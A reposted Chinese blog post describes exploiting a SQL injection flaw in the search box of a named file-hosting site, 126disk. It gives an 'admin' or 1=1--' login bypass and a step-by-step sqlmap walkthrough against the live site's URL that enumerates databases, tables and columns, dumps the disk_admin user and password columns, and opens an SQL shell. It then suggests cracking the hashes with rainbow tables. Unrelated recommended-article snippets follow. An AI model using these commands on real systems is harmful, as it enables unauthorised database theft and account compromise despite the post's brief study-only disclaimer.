126disk网盘sql注入漏洞

Stella981
• 阅读 481

sql注入点有很多,有用户登录注入,如万能密码 admin' or 1=1-- ;还有Web程序中的一些交互注入,如查询之类。有关sql注入详细信息见易踪网文章http://www.yeetrack.com/?p=20。由于126disk网盘对用户输入的查询关键字,没有实行过滤,造成sql注入漏洞,可以探测数据库信息,查看数据库数据,甚至把整个数据库搞到本地,即拖库。
我们在126disk网盘搜索框里输入helloworld',查看结果,

126disk网盘sql注入漏洞
直接把错误报出来,说明对我们输入的单引号进行了解析,web程序的查询sql语法,报出错误。我们可以手动去探测,利用union这个命令去返回我们想要的数据。这里用sqlmap自动化去探测。
1, 找到注入点的url,这里的查询用的get方法,url为http://so.126disk.com/search?key=helloworld, Backtrack中的sqlmap默认路径为/pentest/database/sqlmap,也可以自己去网上免费下载,易踪网分享:http://wangpan.baidu.com/share/link?shareid=63664&uk=537055152。命令:
./sqlmap.py -u http://so.126disk.com/search?key=helloworld --dbs,该条命令是探测数据库用的。易踪网探测结果如图:
126disk网盘sql注入漏洞
我们看到数据库为mysql,操作系统为windows2003,服务器为IIS6,用的php的技术,探测到126disk这个数据库,information_schema库是mysql的系统库,存有一些用户,和表等信息。
2,  探测表名,我们探测到了数据库名,接下来探测表名。命令:
./sqlmap.py -u http://so.126disk.com/search?key=helloworld -D 126disk --table,易踪网探测结果如下:
126disk网盘sql注入漏洞
我们可以看到共24张表。
3, 探测列名,探测到了数据库和表名,我们接下来探测感兴趣的表的列名。我们来探测disk_admin表中的列名。命令:
./sqlmap.py -u http://so.126disk.com/search?key=helloworld -D 126disk -T disk_admin --columns,易踪网探测结果如下:
126disk网盘sql注入漏洞
我们可以看到该表中由我们感兴趣的user和pass列。
4, 探测数据,接下来我们探测数据库中的用户数据,命令:./sqlmap.py -u http://so.126disk.com/search?key=helloworld -D 126disk -T disk_admin -C user,pass --dump,这样我们就可以探测disk_admin中的user和pass列的数据了。这里探测结果就不贴图了。现在的网站一般都不会保存明文密码,一般时md5或者sha1加密,有时还可能会有salt值,想看明文的话,去下个彩虹表去破解吧。
sqlmap还有些特别有意思的参数,如--current-user,可以查看当前登录数据库的用户,--sql-shell是建立一个sql的shell,有了这个shell我们就可以方便的运行sql命令了。命令:
./sqlmap.py -u http://so.126disk.com/search?key=helloworld --sql-shell,截图如:
126disk网盘sql注入漏洞
本文由youthflies发表在易踪网上,本文地址:http://www.yeetrack.com/?p=259易踪网提醒:该方法仅为学习研究之用,不要做破坏之举动。

点赞
收藏
评论区
推荐文章
blmius blmius
2年前
MySQL:[Err] 1292 - Incorrect datetime value: ‘0000-00-00 00:00:00‘ for column ‘CREATE_TIME‘ at row 1
文章目录问题用navicat导入数据时,报错:原因这是因为当前的MySQL不支持datetime为0的情况。解决修改sql\mode:sql\mode:SQLMode定义了MySQL应支持的SQL语法、数据校验等,这样可以更容易地在不同的环境中使用MySQL。全局s
Jacquelyn38 Jacquelyn38
2年前
2020年前端实用代码段,为你的工作保驾护航
有空的时候,自己总结了几个代码段,在开发中也经常使用,谢谢。1、使用解构获取json数据let jsonData  id: 1,status: "OK",data: 'a', 'b';let  id, status, data: number   jsonData;console.log(id, status, number )
Easter79 Easter79
2年前
sql注入
反引号是个比较特别的字符,下面记录下怎么利用0x00SQL注入反引号可利用在分隔符及注释作用,不过使用范围只于表名、数据库名、字段名、起别名这些场景,下面具体说下1)表名payload:select\from\users\whereuser\_id1limit0,1;!(https://o
Stella981 Stella981
2年前
SpringBoot学习:整合shiro自动登录功能(rememberMe记住我功能)
首先在shiro配置类中注入rememberMe管理器!复制代码(https://oscimg.oschina.net/oscnet/675f5689159acfa2c39c91f4df40a00ce0f.gif)/cookie对象;rememberMeCookie()方法是设置Cookie的生成模
Stella981 Stella981
2年前
Python3:sqlalchemy对mysql数据库操作,非sql语句
Python3:sqlalchemy对mysql数据库操作,非sql语句python3authorlizmdatetime2018020110:00:00coding:utf8'''
Stella981 Stella981
2年前
KVM调整cpu和内存
一.修改kvm虚拟机的配置1、virsheditcentos7找到“memory”和“vcpu”标签,将<namecentos7</name<uuid2220a6d1a36a4fbb8523e078b3dfe795</uuid
Easter79 Easter79
2年前
SpringBoot学习:整合shiro自动登录功能(rememberMe记住我功能)
首先在shiro配置类中注入rememberMe管理器!复制代码(https://oscimg.oschina.net/oscnet/675f5689159acfa2c39c91f4df40a00ce0f.gif)/cookie对象;rememberMeCookie()方法是设置Cookie的生成模
可莉 可莉
2年前
126disk网盘sql注入漏洞
sql注入点有很多,有用户登录注入,如万能密码admin'or11;还有Web程序中的一些交互注入,如查询之类。有关sql注入详细信息见易踪网(https://www.oschina.net/action/GoToLink?urlhttp%3A%2F%2Fwww.yeetrack.com)文章http://www.yeetrack.co
Wesley13 Wesley13
2年前
MySQL部分从库上面因为大量的临时表tmp_table造成慢查询
背景描述Time:20190124T00:08:14.70572408:00User@Host:@Id:Schema:sentrymetaLast_errno:0Killed:0Query_time:0.315758Lock_
Python进阶者 Python进阶者
3个月前
Excel中这日期老是出来00:00:00,怎么用Pandas把这个去除
大家好,我是皮皮。一、前言前几天在Python白银交流群【上海新年人】问了一个Pandas数据筛选的问题。问题如下:这日期老是出来00:00:00,怎么把这个去除。二、实现过程后来【论草莓如何成为冻干莓】给了一个思路和代码如下:pd.toexcel之前把这